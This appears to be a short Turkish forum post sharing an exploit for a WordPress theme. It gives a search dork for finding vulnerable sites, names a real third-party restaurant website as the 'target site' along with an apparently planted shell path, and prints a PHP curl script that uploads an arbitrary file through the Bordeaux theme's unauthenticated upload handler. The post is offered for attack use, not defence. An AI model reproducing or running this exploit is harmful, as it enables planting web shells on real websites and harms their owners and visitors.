[video=youtube]
Exploit ;
Kod:
Hedef Site ; http://www.brooklynpizzadenver.com/wp-content/uploads/2013/11/ajanlar.php5
Kod:
inurl:/wp-content/themes/bordeaux-theme/Exploit ;
Kod:
<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/bordeaux-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php
